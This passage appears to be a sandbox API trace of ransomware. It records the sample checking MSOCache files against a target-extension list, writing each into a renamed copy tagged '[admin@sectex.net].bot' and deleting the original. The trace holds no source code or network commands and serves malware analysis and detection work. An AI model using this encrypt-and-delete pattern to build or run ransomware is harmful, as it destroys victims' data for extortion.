	[0034.041] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.041] lstrlenW (lpString=".rar") returned 4
	[0034.042] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.042] lstrlenW (lpString=".bz2") returned 4
	[0034.042] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.042] lstrlenW (lpString=".7z") returned 3
	[0034.042] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.042] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.042] lstrlenW (lpString=".dbf") returned 4
	[0034.042] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.042] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.042] lstrlenW (lpString=".1cd") returned 4
	[0034.042] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.042] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.042] lstrlenW (lpString=".jpg") returned 4
	[0034.042] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.042] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.042] lstrlenW (lpString="GrooveMUI.xml") returned 13
	[0034.042] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.044] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=913) returned 1
	[0034.044] CloseHandle (hObject=0x1ac) returned 1
	[0034.044] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020
	[0034.044] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.044] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.044] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.044] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.044] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0034.044] GetLastError () returned 0x0
	[0034.044] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x391, lpOverlapped=0x0) returned 1
	[0034.046] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x3a0, lpOverlapped=0x0) returned 1
	[0034.047] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.047] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0034.047] SetEndOfFile (hFile=0x1b0) returned 1
	[0034.047] CloseHandle (hObject=0x1b0) returned 1
	[0034.048] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.048] SetEndOfFile (hFile=0x1ac) returned 1
	[0034.049] CloseHandle (hObject=0x1ac) returned 1
	[0034.049] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.049] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1
	[0034.049] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.049] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.049] lstrlenW (lpString=".doc") returned 4
	[0034.049] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.049] lstrlenW (lpString=".docx") returned 5
	[0034.049] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.049] lstrlenW (lpString=".pdf") returned 4
	[0034.049] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.049] lstrlenW (lpString=".xls") returned 4
	[0034.049] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.049] lstrlenW (lpString=".xlsx") returned 5
	[0034.049] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.049] lstrlenW (lpString=".ppt") returned 4
	[0034.050] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString=".zip") returned 4
	[0034.050] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.050] lstrlenW (lpString=".rar") returned 4
	[0034.050] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString=".bz2") returned 4
	[0034.050] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString=".7z") returned 3
	[0034.050] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString=".dbf") returned 4
	[0034.050] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString=".1cd") returned 4
	[0034.050] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString=".jpg") returned 4
	[0034.050] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.050] lstrlenW (lpString=".doc") returned 4
	[0034.050] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString=".docx") returned 5
	[0034.050] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0034.050] lstrlenW (lpString=".pdf") returned 4
	[0034.050] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString=".xls") returned 4
	[0034.050] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.050] lstrlenW (lpString=".xlsx") returned 5
	[0034.050] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0034.050] lstrlenW (lpString=".ppt") returned 4
	[0034.050] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.051] lstrlenW (lpString=".zip") returned 4
	[0034.051] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.051] lstrlenW (lpString=".rar") returned 4
	[0034.051] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.051] lstrlenW (lpString=".bz2") returned 4
	[0034.051] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.051] lstrlenW (lpString=".7z") returned 3
	[0034.051] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.051] lstrlenW (lpString=".dbf") returned 4
	[0034.051] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.051] lstrlenW (lpString=".1cd") returned 4
	[0034.051] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76
	[0034.051] lstrlenW (lpString=".jpg") returned 4
	[0034.051] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.051] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.051] lstrlenW (lpString="Setup.xml") returned 9
	[0034.051] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.051] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1452) returned 1
	[0034.051] CloseHandle (hObject=0x1ac) returned 1
	[0034.052] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0034.052] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.052] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.052] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.052] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.052] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0034.052] GetLastError () returned 0x0
	[0034.052] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x5ac, lpOverlapped=0x0) returned 1
	[0034.054] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0034.054] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.055] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0034.055] SetEndOfFile (hFile=0x1b0) returned 1
	[0034.055] CloseHandle (hObject=0x1b0) returned 1
	[0034.055] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.056] SetEndOfFile (hFile=0x1ac) returned 1
	[0034.056] CloseHandle (hObject=0x1ac) returned 1
	[0034.056] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.057] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0034.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.057] lstrlenW (lpString=".doc") returned 4
	[0034.057] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString=".docx") returned 5
	[0034.057] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.057] lstrlenW (lpString=".pdf") returned 4
	[0034.057] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString=".xls") returned 4
	[0034.057] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString=".xlsx") returned 5
	[0034.057] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.057] lstrlenW (lpString=".ppt") returned 4
	[0034.057] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.057] lstrlenW (lpString=".zip") returned 4
	[0034.057] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.057] lstrlenW (lpString=".rar") returned 4
	[0034.057] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString=".bz2") returned 4
	[0034.057] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.057] lstrlenW (lpString=".7z") returned 3
	[0034.057] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.057] lstrlenW (lpString=".dbf") returned 4
	[0034.057] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".1cd") returned 4
	[0034.058] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".jpg") returned 4
	[0034.058] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".doc") returned 4
	[0034.058] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString=".docx") returned 5
	[0034.058] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0034.058] lstrlenW (lpString=".pdf") returned 4
	[0034.058] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString=".xls") returned 4
	[0034.058] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString=".xlsx") returned 5
	[0034.058] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0034.058] lstrlenW (lpString=".ppt") returned 4
	[0034.058] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".zip") returned 4
	[0034.058] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.058] lstrlenW (lpString=".rar") returned 4
	[0034.058] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString=".bz2") returned 4
	[0034.058] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString=".7z") returned 3
	[0034.058] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".dbf") returned 4
	[0034.058] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.058] lstrlenW (lpString=".1cd") returned 4
	[0034.059] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0034.059] lstrlenW (lpString=".jpg") returned 4
	[0034.059] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.059] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0034.059] lstrlenW (lpString="branding.xml") returned 12
	[0034.059] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.060] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=596341) returned 1
	[0034.060] CloseHandle (hObject=0x1ac) returned 1
	[0034.060] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020
	[0034.060] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac
	[0034.060] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.060] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0034.060] GetLastError () returned 0x0
	[0034.060] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x91975, lpOverlapped=0x0) returned 1
	[0034.074] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x91980, lpOverlapped=0x0) returned 1
	[0034.521] ReadFile (in: hFile=0x1ac, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.522] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0034.522] SetEndOfFile (hFile=0x1b0) returned 1
	[0034.523] CloseHandle (hObject=0x1b0) returned 1
	[0034.532] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.532] SetEndOfFile (hFile=0x1ac) returned 1
	[0034.537] CloseHandle (hObject=0x1ac) returned 1
	[0034.538] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.538] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1
	[0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.539] lstrlenW (lpString=".doc") returned 4
	[0034.539] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString=".docx") returned 5
	[0034.539] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
	[0034.539] lstrlenW (lpString=".pdf") returned 4
	[0034.539] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString=".xls") returned 4
	[0034.539] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString=".xlsx") returned 5
	[0034.539] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1
	[0034.539] lstrlenW (lpString=".ppt") returned 4
	[0034.539] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.539] lstrlenW (lpString=".zip") returned 4
	[0034.539] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.539] lstrlenW (lpString=".rar") returned 4
	[0034.539] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString=".bz2") returned 4
	[0034.539] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString=".7z") returned 3
	[0034.539] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.539] lstrlenW (lpString=".dbf") returned 4
	[0034.539] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.539] lstrlenW (lpString=".1cd") returned 4
	[0034.540] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString=".jpg") returned 4
	[0034.540] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75
	[0034.540] lstrlenW (lpString=".doc") returned 4
	[0034.540] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.540] lstrlenW (lpString=".docx") returned 5
	[0034.540] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1
